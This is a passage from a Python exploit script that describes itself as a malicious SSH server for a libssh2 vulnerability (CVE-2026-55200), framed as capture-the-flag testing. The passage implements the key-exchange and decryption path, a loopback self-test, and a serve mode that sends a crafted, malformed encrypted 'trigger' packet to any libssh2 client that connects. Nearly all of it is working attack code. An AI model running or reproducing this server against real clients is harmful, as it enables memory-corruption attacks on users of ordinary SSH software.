    if offset != len(reply):
        raise RuntimeError("trailing data in KEX_ECDH_REPLY")

    shared = client_private.exchange(x25519.X25519PublicKey.from_public_bytes(server_pub))
    shared_int = int.from_bytes(shared, "big")
    h = exchange_hash(CLIENT_IDENT, SERVER_IDENT, client_kexinit, server_kexinit,
                      hostkey_blob, client_pub, server_pub, shared_int)
    # H doubles as the session id for the first key exchange.
    key_s2c = derive_key(shared_int, h, h, b"D", 64)

    newkeys = read_plain_packet(client_sock)
    if newkeys != b"\x15":
        raise RuntimeError(f"expected server NEWKEYS, got {newkeys[:1]!r}")
    send_plain_packet(client_sock, b"\x15")

    # Encrypted fragment = 4-byte length field + body_len body bytes + 16-byte tag.
    encrypted_len = 4 + args.body_len + 16
    encrypted = read_exact(client_sock, encrypted_len)
    if args.filler_len:
        # Drain the unencrypted filler that follows the tag.
        read_exact(client_sock, args.filler_len)
    # Sequence number 3 matches the server's three earlier packets
    # (KEXINIT, KEX_ECDH_REPLY, NEWKEYS).
    decrypted = chachapoly_decrypt(key_s2c, 3, encrypted)
    decoded_len = struct.unpack(">I", decrypted[:4])[0]
    if decoded_len != args.packet_length:
        raise RuntimeError("loopback decrypted packet_length mismatch")
    return decoded_len, encrypted_len
|
|
|
|
|
|
def loopback_test(args):
    """Run the server handler and loopback_client against each other in-process.

    The server runs in a daemon thread on one end of a socketpair. Its result
    (None on success, or the exception it raised) is passed back via a
    queue. Raises SystemExit if the server thread is still alive after the
    join timeout, and re-raises any server exception.
    """
    server_end, client_end = socket.socketpair()
    outcome = queue.Queue()

    def run_server():
        try:
            with server_end:
                server_end.settimeout(args.timeout)
                MiniSSHExploitServer(args).handle_client(server_end)
                outcome.put(None)
        except Exception as exc:
            outcome.put(exc)

    worker = threading.Thread(target=run_server, daemon=True)
    worker.start()
    try:
        with client_end:
            decoded_len, encrypted_len = loopback_client(client_end, args)
    finally:
        # Allow for the handshake timeout plus the server's hold-open sleep.
        worker.join(args.timeout + args.hold_open + 1)

    if worker.is_alive():
        raise SystemExit("[loopback-test] FAIL: server thread did not exit")
    server_error = outcome.get_nowait()
    if server_error is not None:
        raise server_error

    for line in (
        "[loopback-test] minimal SSH handshake/key-derivation path",
        f"decrypted_trigger_packet_length=0x{decoded_len:08x} ({decoded_len})",
        f"encrypted_trigger_fragment_len={encrypted_len}",
        "[loopback-test] PASS",
    ):
        print(line)
|
|
|
|
|
|
def _build_arg_parser():
    """Construct the command-line parser used by main()."""
    parser = argparse.ArgumentParser(
        description="Minimal malicious SSH server/trigger for HTB-style libssh2 CVE-2026-55200 testing."
    )
    # Mode switches, checked in this order of precedence by main().
    for flag, text in (
        ("--self-test", "verify local packet crypto and CVE arithmetic"),
        ("--loopback-test", "verify the local SSH handshake and encrypted trigger path"),
        ("--serve", "listen for one libssh2 client and send the trigger"),
    ):
        parser.add_argument(flag, action="store_true", help=text)
    parser.add_argument("--listen-host", default=HOST, help="listen IP/interface, e.g. 0.0.0.0")
    parser.add_argument("--listen-port", type=int, default=PORT, help="listen port, e.g. 2222")
    # int(x, 0) accepts decimal, 0x-hex, 0o-octal and 0b-binary literals.
    parser.add_argument("--packet-length", type=lambda x: int(x, 0), default=DEFAULT_PACKET_LENGTH)
    parser.add_argument("--body-len", type=int, default=8, help="truncated encrypted body length after the 4-byte length field")
    parser.add_argument("--filler-len", type=int, default=64, help="extra bytes after the valid encrypted fragment/tag")
    parser.add_argument("--timeout", type=float, default=10.0)
    parser.add_argument("--hold-open", type=float, default=1.0)
    return parser


def main():
    """Parse arguments and run exactly one mode: self-test, loopback test, or serve.

    With no mode flag, the help text is printed. --serve exits with an error
    unless both --listen-host and --listen-port are set.
    """
    parser = _build_arg_parser()
    args = parser.parse_args()
    if args.self_test:
        self_test(args)
    elif args.loopback_test:
        loopback_test(args)
    elif args.serve:
        if not args.listen_host or not args.listen_port:
            raise SystemExit("set --listen-host and --listen-port; the HOST/PORT section is intentionally open")
        MiniSSHExploitServer(args).serve_once()
    else:
        parser.print_help()
|
|
|
|
|
|
if __name__ == "__main__":
    # Ordinary exceptions are reported with a traceback and exit status 1.
    # KeyboardInterrupt and SystemExit derive from BaseException rather than
    # Exception, so they propagate unchanged without an explicit clause.
    try:
        main()
    except Exception:
        traceback.print_exc()
        sys.exit(1)
|